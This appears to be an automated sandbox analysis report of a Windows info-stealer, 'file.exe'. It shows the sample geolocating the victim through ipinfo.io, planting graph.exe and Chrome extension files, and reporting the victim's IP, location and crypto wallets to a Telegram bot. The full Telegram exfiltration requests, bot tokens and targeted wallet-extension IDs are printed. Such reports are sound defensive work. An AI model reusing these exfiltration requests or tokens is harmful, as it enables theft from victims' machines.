2024-12-12 15:53:52 UTC	1390	IN	Data Raw: fd 13 11 fd c1 ed 76 1f 2f 93 5a ea 61 d0 6f 45 c7 20 04 e3 38 d1 21 48 b1 a5 65 62 4b eb ca 23 44 97 88 f8 bb bf ba f5 3f 30 f6 dc ee 26 c4 cc f7 e7 e4 e4 0c f0 78 3c 73 88 28 0d 2f fc 53 5c fd ea c0 be a2 c3 10 41 01 62 de ce 22 89 97 96 43 91 69 dd 63 63 9c 26 a2 d9 f5 75 3b b1 b2 7a 0b 3c b9 9d 23 ff 5c 6a 18 c6 55 45 45 45 01 11 b1 48 49 b2 a1 ba 1f 6c de 39 dd 29 98 94 96 77 5f 95 84 49 cb c4 96 b6 3d b6 17 6f 3b 18 e1 70 6f 51 cd 2f db f9 f3 36 b5 5d 97 ab dc 6e f7 33 b2 87 d6 06 b8 70 68 fa 6e c1 c9 fd 44 47 20 c5 96 96 43 91 69 db 63 0b 87 3d 22 9b 7f fc d7 55 af cb 61 c7 36 c4 50 ba 88 0e 41 a0 74 fe d9 1d 2f 2d 13 5b da f6 d8 80 83 44 36 5e cb c6 7e 22 db 97 92 8c 90 2f 3a 04 81 da a1 b8 38 2d 87 61 53 41 5a 26 b6 b4 ed b1 11 89 fe 22 6a 7d 2d Data Ascii: v/ZaoE 8!HebK#D?0&x<s(/S\Ab"Cicc&u;z<#\jUEEEHIl9)w_I=o;poQ/6]n3phnDG Cic="Ua6PAt/-[D6^~"/:8-aSAZ&"j}-
2024-12-12 15:53:52 UTC	1390	IN	Data Raw: d4 66 5f d7 50 8e ca 11 fc 7e ff 68 8a f4 2a e3 1f 92 dd c0 cc f7 b8 5c ae fb dd 6e 77 6d b3 af 9c 37 b3 1f 98 4f 06 f3 71 00 0a 33 48 39 28 c4 46 6e b6 e2 42 47 25 13 bd b3 f3 a1 e6 74 46 2e 65 dc f9 f0 7b c1 5b ea 6f d6 8d 4f 30 18 1c 69 18 c6 7d 00 8a 4c bc 3c 72 fe 7f 19 86 71 9d 9c 7f 73 a8 91 a7 5e 40 c4 73 44 87 61 85 1e 9d 3a 18 af dd 34 59 d9 ab b7 d6 94 85 8a a2 5c ef 76 bb 57 d8 13 99 35 64 62 4b a6 25 5a 06 36 d0 6d 60 dc e0 b0 d8 be 03 f1 d9 a2 7b 6f c1 60 f0 08 c3 30 ee 02 30 3c ce 43 77 12 d1 43 d9 d9 d9 77 f4 eb d7 2f a1 aa 23 81 40 60 02 33 3f dd c4 53 13 54 55 7d 26 91 73 62 cf f9 b7 bf 02 e8 69 e2 90 2d cc 3c ab ad ce 6d a4 ba 4e e3 ce 29 df ba 63 e7 61 a2 e3 48 b6 03 ba 77 bd e8 cd 5b ae 29 60 e6 ab 4d 8c 20 19 44 f4 62 38 1c be b1 a8 Data Ascii: f_P~h*\nwm7Oq3H9(FnBG%tF.e{[oO0i}L<rqs^@sDa:4Y\vW5dbK%Z6m`{o`00<CwCw/#@`3?STU}&sbi-<mN)caHw[)`M Db8
2024-12-12 15:53:52 UTC	1390	IN	Data Raw: 13 d8 5d 61 21 11 5d e7 f1 78 2a 12 0b 33 71 4e 4a 6c d8 f3 fe b7 bb 00 34 b9 2f ce 5e 22 1f c6 7b f2 f2 f2 66 f5 e9 d3 a7 3a e9 01 cd d3 0a 60 28 8f 00 3c 32 e9 e7 ae f7 31 14 ba dc 8e 1e 1c 33 93 ae eb 67 2a 8a f2 57 66 ee 6d e2 90 3a 00 8f d6 d4 d4 4c 8b 39 7a 70 e2 89 1d a8 2e eb 19 30 c6 25 3d e0 e4 d8 c9 e0 cb b0 e8 b5 a4 57 ee 0f 04 02 87 37 bc 4f cd 5c ec 54 01 b8 77 fb f6 ed 77 0d 1b 36 6c 57 b2 63 31 4b 26 b6 78 2c d1 32 f0 2b 95 9b ac 34 91 5a 18 e7 c6 aa 91 88 fa f9 89 bc 70 38 7c 05 11 45 7a aa f9 71 9e fd f3 86 1e 87 b0 72 3d 4e 4b 6c 8d 12 98 7f fb 8e 88 6e 71 bb dd cf 50 32 7a 40 d1 32 64 33 af 07 f3 4c 1b 4a bf 85 41 7c 17 ba 61 3a 46 68 21 2b 1a 68 28 02 70 3f 80 61 26 0f 59 00 60 b2 aa aa 5f 99 78 2d 61 d4 b8 89 04 fa ab a0 32 79 4d 63 Data Ascii: ]a!]x3qNJl4/^"{f:`(<213gWfm:L9zp.0%=W7O\Tww6lWc1K&x,2+4Zp8\|Ezqr=NKlnqP2z@2d3LJA\|a:Fh!+h(p?a&Y`_x-a2yMc
2024-12-12 15:53:52 UTC	1390	IN	Data Raw: 36 3e 10 0c 06 b3 0c c3 f8 4b c3 76 40 66 4a 3c 59 33 8f 66 b1 55 ab 56 ed b7 69 db f6 1f 8e b9 e9 b6 7d 9e cb ca 70 7d 53 f3 d6 4b 29 57 d2 0b 7b ee 92 3f cb 64 e9 c1 55 0d c3 93 ff db 19 bf 74 c6 61 00 47 7a dc ed 2c 0e f7 13 6c ee f5 5b 5c 76 59 9d c5 ed 98 62 fd 4d d2 75 a1 51 e9 94 d4 22 96 55 35 b9 0a 7b 33 33 4f d9 be 7d 7b 7f af d7 fb 44 2a 25 b5 b6 24 f2 81 f7 7a bd 65 35 35 35 85 91 bf 47 c3 0d b1 cd 69 0f 60 7a be c2 6b 1c 9c d4 10 fd e2 0a 85 fe 5b b7 34 10 08 8c 35 0c a3 12 c0 03 26 93 da 02 c3 30 0a 54 55 9d 94 4a 49 ad 25 6c 38 6e 6f 47 d3 88 c8 88 bc 57 15 45 19 c8 cc 97 01 f8 b5 85 43 0a 88 a8 34 10 08 2c ab a8 a8 f8 2d 4a ef cb 05 b8 d4 86 a4 16 71 24 3a fd 74 8d 0d ed 98 62 7d 62 53 8c 64 95 16 4a 19 eb 6a b7 e3 97 d0 7f 17 d7 d5 11 d1 Data Ascii: 6>Kv@fJ<Y3fUVi}p}SK)W{?dUtaGz,l[\vYbMuQ"U5{33O}{D*%$ze555Gi`zk[45&0TUJI%l8noGWEC4,-Jq$:tb}bSdJj
2024-12-12 15:53:52 UTC	1390	IN	Data Raw: d3 09 73 6b 8d ec b9 9a a1 e8 d6 fb e9 e2 5b f8 a6 a7 65 25 f5 36 c9 37 65 2b 88 e7 8b 0e c3 3c 7a 17 be 5b e5 fc 5a 23 4a e3 1e 5b 23 9f 36 1d e0 87 2d 3a fb 66 80 4f c6 99 b7 ae b5 e8 fc 09 b1 e7 8f ce c6 4b f5 bf 80 74 40 4f 82 c8 8e ae bf 64 17 c6 bd a2 43 30 8d f9 3e d1 21 38 4c fa ce b1 ed ce a7 5d 05 a6 9b 93 3c 2d f4 15 14 fa 2d 7c da a7 49 3c 67 52 d8 93 d8 7c 5a 15 08 56 5d 31 38 c9 0e 84 8c bf 89 0e 42 4a b2 e8 07 37 25 e6 da 56 c0 37 6d 81 e8 20 1c 25 cd b6 ad 69 d6 59 d3 ee 00 f1 68 00 5f b6 f2 4c 0c c6 53 a8 e5 21 38 73 5a 30 49 d1 25 95 7d dd 74 e6 07 c4 dc 57 61 a3 48 f2 3e 57 13 b9 75 ad 64 15 c3 b8 1a 80 c3 57 1a f2 b5 72 b4 60 4f 9c 26 1b 8d 9a 56 ac 2d c5 0e 56 c1 b8 06 c0 0f f1 1c 1a b9 42 c8 20 d7 3b 30 78 18 ce 9a 7e 31 ce d7 1c 5b Data Ascii: sk[e%67e+<z[Z#J[#6-:fOKt@OdC0>!8L]<--\|I<gR\|ZV]18BJ7%V7m %iYh_LS!8sZ0I%}tWaH>WudWr`O&V-VB ;0x~1[
2024-12-12 15:53:52 UTC	1390	IN	Data Raw: ce 8f ee 59 d3 1b 5a 86 bb fe b5 84 10 b1 ac aa 52 ee d8 e2 4c f4 25 b6 9f 3b 3e b5 7a c9 cf db 1a 7d a2 aa 5f 02 b8 a4 91 33 f8 d1 4b af 59 6f 5c 80 42 08 53 25 27 c9 1d 5b 9c 89 fe c4 26 c2 e7 83 89 6d 91 58 75 29 98 2e fc e3 77 05 03 bb da 5a c1 4a 0a da 58 12 71 8e 2d 1d 99 49 6d 71 76 62 9a d9 51 8a 78 33 60 e8 79 00 2e 86 82 6e 0a 73 87 4b 1e 71 b6 fe 5d 2f 47 d3 c7 fb 6a 25 b1 c5 19 49 6c e2 a7 16 bc 6a c3 d1 c3 7f 04 f1 dd 40 75 5f 30 d5 95 71 5c 15 07 eb fe f9 b9 54 8b f5 65 e4 8c eb 06 9f e5 1f f8 c3 98 9d 66 84 2c e2 c0 95 43 4e 57 34 ba 97 81 3f 02 7c 5e dd d7 f8 78 3b a0 d2 63 15 f8 78 c5 d7 4d 9f 5b 5d 25 a5 c8 38 23 bf 70 71 1c 33 21 67 dc 9f 51 76 e8 3b 10 ff 0b c0 65 7a de 1f e5 be da 0e 00 46 c3 e2 fb 06 1f 3b 5f 47 8e 33 12 16 d5 8b 58 Data Ascii: YZRL%;>z}_3KYo\BS%'[&mXu).wZJXq-ImqvbQx3`y.nsKq]/Gj%Ilj@u_0q\Tef,CNW4?\|^x;cxM[]%8#pq3!gQv;ezF;_G3X

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.9	49740	34.117.59.81	443	7456	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-12 15:53:51 UTC	91	OUT	GET /json HTTP/1.1 User-Agent: IPInfoFetcher Host: ipinfo.io Cache-Control: no-cache
2024-12-12 15:53:52 UTC	345	IN	HTTP/1.1 200 OK access-control-allow-origin: * Content-Length: 321 content-type: application/json; charset=utf-8 date: Thu, 12 Dec 2024 15:53:52 GMT x-content-type-options: nosniff via: 1.1 google strict-transport-security: max-age=2592000; includeSubDomains Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-12-12 15:53:52 UTC	321	IN	Data Raw: 7b 0a 20 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 0a 20 20 22 68 6f 73 74 6e 61 6d 65 22 3a 20 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 31 38 39 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 0a 20 20 22 63 69 74 79 22 3a 20 22 4e 65 77 20 59 6f 72 6b 20 43 69 74 79 22 2c 0a 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 22 6c 6f 63 22 3a 20 22 34 30 2e 37 31 34 33 2c 2d 37 34 2e 30 30 36 30 22 2c 0a 20 20 22 6f 72 67 22 3a 20 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20 33 20 50 61 72 65 6e 74 2c 20 4c 4c 43 22 2c 0a 20 20 22 70 6f 73 74 61 6c 22 3a 20 22 31 30 30 30 31 22 2c 0a 20 20 22 74 69 6d 65 7a 6f 6e 65 22 3a Data Ascii: { "ip": "8.46.123.189", "hostname": "static-cpe-8-46-123-189.centurylink.com", "city": "New York City", "region": "New York", "country": "US", "loc": "40.7143,-74.0060", "org": "AS3356 Level 3 Parent, LLC", "postal": "10001", "timezone":

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.9	49747	34.117.59.81	443	7540	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-12 15:53:54 UTC	91	OUT	GET /json HTTP/1.1 User-Agent: IPInfoFetcher Host: ipinfo.io Cache-Control: no-cache
2024-12-12 15:53:54 UTC	345	IN	HTTP/1.1 200 OK access-control-allow-origin: * Content-Length: 321 content-type: application/json; charset=utf-8 date: Thu, 12 Dec 2024 15:53:54 GMT x-content-type-options: nosniff via: 1.1 google strict-transport-security: max-age=2592000; includeSubDomains Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-12-12 15:53:54 UTC	321	IN	Data Raw: 7b 0a 20 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 0a 20 20 22 68 6f 73 74 6e 61 6d 65 22 3a 20 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 31 38 39 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 0a 20 20 22 63 69 74 79 22 3a 20 22 4e 65 77 20 59 6f 72 6b 20 43 69 74 79 22 2c 0a 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 22 6c 6f 63 22 3a 20 22 34 30 2e 37 31 34 33 2c 2d 37 34 2e 30 30 36 30 22 2c 0a 20 20 22 6f 72 67 22 3a 20 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20 33 20 50 61 72 65 6e 74 2c 20 4c 4c 43 22 2c 0a 20 20 22 70 6f 73 74 61 6c 22 3a 20 22 31 30 30 30 31 22 2c 0a 20 20 22 74 69 6d 65 7a 6f 6e 65 22 3a Data Ascii: { "ip": "8.46.123.189", "hostname": "static-cpe-8-46-123-189.centurylink.com", "city": "New York City", "region": "New York", "country": "US", "loc": "40.7143,-74.0060", "org": "AS3356 Level 3 Parent, LLC", "postal": "10001", "timezone":

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.9	49746	149.154.167.220	443	7456	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-12 15:53:54 UTC	513	OUT	GET /bot7855878545:AAEEMUvgpX9jTAxlDd2gM_Sbv2jbI6-5_0o/sendMessage?chat_id=7427009775&text=%3Cb%3E%F0%9F%94%94NEW%20VICTIM%20%2D%20Extensions%20Installed%3C%2Fb%3E%0A%3Cb%3EIP%20Address%3A%3C%2Fb%3E%208%2E46%2E123%2E189%0A%3Cb%3EDevice%20Name%3A%3C%2Fb%3E%20065367%0A%3Cb%3ELocation%3A%3C%2Fb%3E%20New%20York%20City%2C%20New%20York%2C%20US%0A%3Cb%3EWallets%3A%3C%2Fb%3E%0A%3Ccode%3ENothing%20found%3C%2Fcode%3E&parse_mode=HTML HTTP/1.1 User-Agent: TelegramBot Host: api.telegram.org Cache-Control: no-cache
2024-12-12 15:53:54 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Thu, 12 Dec 2024 15:53:54 GMT Content-Type: application/json Content-Length: 776 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-12 15:53:54 UTC	776	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 33 31 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 38 35 35 38 37 38 35 34 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 72 68 6a 64 66 74 6a 6b 77 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 72 68 6a 64 66 74 6a 6b 77 34 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 34 32 37 30 30 39 37 37 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 30 34 31 61 5c 75 30 34 33 30 5c 75 30 34 34 30 5c 75 30 34 33 34 5c 75 30 34 33 30 5c 75 30 34 33 64 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 30 34 31 32 5c 75 30 34 33 30 5c 75 30 34 33 62 5c 75 30 34 33 65 5c 75 30 34 33 32 22 2c Data Ascii: {"ok":true,"result":{"message_id":3314,"from":{"id":7855878545,"is_bot":true,"first_name":"srhjdftjkw4","username":"srhjdftjkw4_bot"},"chat":{"id":7427009775,"first_name":"\u041a\u0430\u0440\u0434\u0430\u043d","last_name":"\u0412\u0430\u043b\u043e\u0432",

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.9	49749	149.154.167.220	443	7540	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-12 15:53:56 UTC	513	OUT	GET /bot7855878545:AAEEMUvgpX9jTAxlDd2gM_Sbv2jbI6-5_0o/sendMessage?chat_id=7427009775&text=%3Cb%3E%F0%9F%94%94NEW%20VICTIM%20%2D%20Extensions%20Installed%3C%2Fb%3E%0A%3Cb%3EIP%20Address%3A%3C%2Fb%3E%208%2E46%2E123%2E189%0A%3Cb%3EDevice%20Name%3A%3C%2Fb%3E%20065367%0A%3Cb%3ELocation%3A%3C%2Fb%3E%20New%20York%20City%2C%20New%20York%2C%20US%0A%3Cb%3EWallets%3A%3C%2Fb%3E%0A%3Ccode%3ENothing%20found%3C%2Fcode%3E&parse_mode=HTML HTTP/1.1 User-Agent: TelegramBot Host: api.telegram.org Cache-Control: no-cache
2024-12-12 15:53:56 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Thu, 12 Dec 2024 15:53:56 GMT Content-Type: application/json Content-Length: 776 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-12 15:53:56 UTC	776	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 33 31 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 38 35 35 38 37 38 35 34 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 72 68 6a 64 66 74 6a 6b 77 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 72 68 6a 64 66 74 6a 6b 77 34 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 34 32 37 30 30 39 37 37 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 30 34 31 61 5c 75 30 34 33 30 5c 75 30 34 34 30 5c 75 30 34 33 34 5c 75 30 34 33 30 5c 75 30 34 33 64 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 30 34 31 32 5c 75 30 34 33 30 5c 75 30 34 33 62 5c 75 30 34 33 65 5c 75 30 34 33 32 22 2c Data Ascii: {"ok":true,"result":{"message_id":3316,"from":{"id":7855878545,"is_bot":true,"first_name":"srhjdftjkw4","username":"srhjdftjkw4_bot"},"chat":{"id":7427009775,"first_name":"\u041a\u0430\u0440\u0434\u0430\u043d","last_name":"\u0412\u0430\u043b\u043e\u0432",

Target ID:	0
Start time:	10:53:38
Start date:	12/12/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0x7ff7abc00000
File size:	605'696 bytes
MD5 hash:	3567CB15156760B2F111512FFDBC1451
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	10:53:39
Start date:	12/12/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\Desktop\file.exe
Imagebase:	0x7ff7abc00000
File size:	605'696 bytes
MD5 hash:	3567CB15156760B2F111512FFDBC1451
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	10:53:49
Start date:	12/12/2024
Path:	C:\Program Files\Windows Media Player\graph\graph.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Windows Media Player\graph\graph.exe"
Imagebase:	0x7ff6a22f0000
File size:	251'392 bytes
MD5 hash:	7D254439AF7B1CAAA765420BEA7FBD3F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	10:53:52
Start date:	12/12/2024
Path:	C:\Program Files\Windows Media Player\graph\graph.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Windows Media Player\graph\graph.exe"
Imagebase:	0x7ff6a22f0000
File size:	251'392 bytes
MD5 hash:	7D254439AF7B1CAAA765420BEA7FBD3F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	7
Start time:	10:54:01
Start date:	12/12/2024
Path:	C:\Program Files\Windows Media Player\graph\graph.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Windows Media Player\graph\graph.exe"
Imagebase:	0x7ff6a22f0000
File size:	251'392 bytes
MD5 hash:	7D254439AF7B1CAAA765420BEA7FBD3F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	10:54:09
Start date:	12/12/2024
Path:	C:\Program Files\Windows Media Player\graph\graph.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Windows Media Player\graph\graph.exe"
Imagebase:	0x7ff6a22f0000
File size:	251'392 bytes
MD5 hash:	7D254439AF7B1CAAA765420BEA7FBD3F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	12.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	49.6%
Total number of Nodes:	2000
Total number of Limit Nodes:	39

Executed Functions

Function 00007FF7ABC183F0 Relevance: 232.4, APIs: 30, Strings: 101, Instructions: 3173networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7ABC17970: K32EnumProcesses.KERNEL32(FFFFFFFF), ref: 00007FF7ABC179A3

GetConsoleWindow.KERNEL32(-00000027,?,?,?,00000006), ref: 00007FF7ABC184BE
ShowWindow.USER32(?,?,?,00000006), ref: 00007FF7ABC184C9
WSAStartup.WS2_32(?,?,?,00000006), ref: 00007FF7ABC184DB

Part of subcall function 00007FF7ABC1C660: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC1C6D0

Part of subcall function 00007FF7ABC05D00: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC05D58

Part of subcall function 00007FF7ABC1C660: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC1C741

Part of subcall function 00007FF7ABC15EC0: GetModuleFileNameA.KERNEL32 ref: 00007FF7ABC15F4F
Part of subcall function 00007FF7ABC15EC0: GetLastError.KERNEL32 ref: 00007FF7ABC15F65
Part of subcall function 00007FF7ABC15EC0: GetLastError.KERNEL32 ref: 00007FF7ABC15FEA

Part of subcall function 00007FF7ABC05D60: CreateToolhelp32Snapshot.KERNEL32 ref: 00007FF7ABC05DA2

Part of subcall function 00007FF7ABC07C50: __std_fs_code_page.LIBCPMT ref: 00007FF7ABC07CEE
Part of subcall function 00007FF7ABC07C50: __std_fs_code_page.LIBCPMT ref: 00007FF7ABC07D7A

gethostname.WS2_32 ref: 00007FF7ABC1B54E
WSACleanup.WS2_32 ref: 00007FF7ABC1BE10
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC1C2F6
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC1C31F
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7ABC1C325
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC1C32B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC1C331
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC1C33D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC1C343
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC1C35B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC1C367
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC1C36D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC1C373
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC1C379
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC1C37F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC1C385
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC1C38B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC1C391
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC1C397
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC1C39D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC1C3A3
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC1C3A9
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC1C3AF
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC1C3B5
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC1C3BB
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC1C3C1
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7ABC1C3C7

Part of subcall function 00007FF7ABC42A38: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7ABC42A68
Part of subcall function 00007FF7ABC42A38: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7ABC42A6E

Part of subcall function 00007FF7ABC15450: __std_fs_code_page.LIBCPMT ref: 00007FF7ABC154BA

Strings

13375110331747787, xrefs: 00007FF7ABC1915D, 00007FF7ABC1926B
Directory don't exist , xrefs: 00007FF7ABC17DB2
Failed to open output ZIP file: , xrefs: 00007FF7ABC181BD
2CDA9B33DF3854077ED63B9E912DD676B1892A6CDD18DC59790C40799E92D71B, xrefs: 00007FF7ABC18AAD
7340678156, xrefs: 00007FF7ABC1BCB2
exists, xrefs: 00007FF7ABC17E23
C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f, xrefs: 00007FF7ABC1B30B, 00007FF7ABC1B363
13375110296496201, xrefs: 00007FF7ABC195E6, 00007FF7ABC196EB
efbglgofoippbgcjepnhiblaibcnclgk, xrefs: 00007FF7ABC194CC
ios_base::eofbit set, xrefs: 00007FF7ABC18348, 00007FF7ABC183A8
aholpfdialjgjfhomihkjbmgjidlcdno, xrefs: 00007FF7ABC18DBD
action.onClicked, xrefs: 00007FF7ABC18FB8
terminated successfully., xrefs: 00007FF7ABC1846B
Nothing found, xrefs: 00007FF7ABC1BDB2
\AppData\Local\Google\Chrome\User Data, xrefs: 00007FF7ABC1A8B7
7855878545:AAEEMUvgpX9jTAxlDd2gM_Sbv2jbI6-5_0o, xrefs: 00007FF7ABC1BD48
C:\Program Files\Windows Media Player\graph, xrefs: 00007FF7ABC1B27F
active_permissions, xrefs: 00007FF7ABC1ACC3, 00007FF7ABC1ADB7
D304D4787A15629A04F596502ED8CF8C6031BF683EB7BCFDB1819D5F02C9667B, xrefs: 00007FF7ABC19D46
13375110241046665, xrefs: 00007FF7ABC18E88, 00007FF7ABC18F37
Processing: , xrefs: 00007FF7ABC1AB06
C:\Program Files\Google\Chrome\Extensions, xrefs: 00007FF7ABC1B4FB
There are no users. Exit, xrefs: 00007FF7ABC1C2FC
graph.exe, xrefs: 00007FF7ABC18447
Wallets:<code>, xrefs: 00007FF7ABC1B9C4
remove_all, xrefs: 00007FF7ABC17E3A
18750852BBA140FCF329F0B2F98ED961304CD00CFEE1A5FF44762B97F2CE9E2F, xrefs: 00007FF7ABC19A5F
ZIP file extracted successfully to , xrefs: 00007FF7ABC18267
805CF202E4DF8532D12BE509DE6794904E1C5D1F9FD783FD1507ADE27DEEE8AA, xrefs: 00007FF7ABC19775
6442787215, xrefs: 00007FF7ABC1BD16
Extraction failed., xrefs: 00007FF7ABC1B3B2
13375110354575865, xrefs: 00007FF7ABC19BAE, 00007FF7ABC19CBC
fnjhmkhhmkbjkkabndcnnogagogbneec, xrefs: 00007FF7ABC19D72
ios_base::badbit set, xrefs: 00007FF7ABC18336, 00007FF7ABC18395
nkbihfbeogaeaoehlefnkodbefgpgknn, xrefs: 00007FF7ABC18804
lpfcbjknijpeeillifnkikgncikgfhdo, xrefs: 00007FF7ABC197A4
C:\Program Files\Google\Chrome\Extensions\mcohilncbfahbmgdjkbpemcciiolgcge, xrefs: 00007FF7ABC19CE1
13374561731521706, xrefs: 00007FF7ABC18D04
Location: , xrefs: 00007FF7ABC1B8C4
CAC5B4D0F32AA7D73E8AF05E83A188D2ECBA2B6186D06E54306BC2427BBCD68C, xrefs: 00007FF7ABC192F5
hash, xrefs: 00007FF7ABC1AEBC
Device Name: , xrefs: 00007FF7ABC1B7D5
7867603719:AAEHk7Xd_OIqLVzZCPZMe4dTduUoZLQ8y2Y, xrefs: 00007FF7ABC1BCE4
13375110344191823, xrefs: 00007FF7ABC198C7, 00007FF7ABC199D5
hifafgmccdpekplomjjkcfgodnhcellj, xrefs: 00007FF7ABC18ADC
C:\Program Files\Windows Media Player\graph, xrefs: 00007FF7ABC1B3C5
